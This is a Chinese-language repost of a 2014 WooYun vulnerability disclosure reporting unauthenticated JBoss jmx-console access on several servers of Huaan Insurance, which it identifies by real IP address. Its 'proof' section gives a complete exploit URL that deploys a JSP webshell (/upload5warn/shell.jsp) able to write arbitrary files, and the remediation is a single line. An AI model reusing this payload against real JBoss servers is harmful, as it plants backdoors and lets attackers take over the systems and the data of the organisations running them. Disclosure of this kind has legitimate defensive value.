记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

华安保险多个系统存在未授权访问getshell

2014-11-20 06:40

http://58.251.33.155:8080/Apache-Coyote/1.1 [Jboss]Upload /upload5warn/shell.jsp华安财险 - Power by sinosafe

http://58.251.33.182:8080/Apache-Coyote/1.1 [Jboss]Upload /upload5warn/shell.jsp华安保险,华安学贷保险

http://58.251.33.183:8080/Apache-Coyote/1.1 [Jboss]Upload /upload5warn/shell.jspCoremail邮件系统-华安财产保险股份有限公司



(以上80端口访问都显示华安财产保险股份有限公司的)jboss未授权访问导致getshell

漏洞证明:

code 区域
http://58.251.33.155:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True





以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

修复方案:

jboss限制访问

知识来源: www.wooyun.org/bugs/wooyun-2014-078415

阅读:77715 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“华安保险多个系统存在未授权访问getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云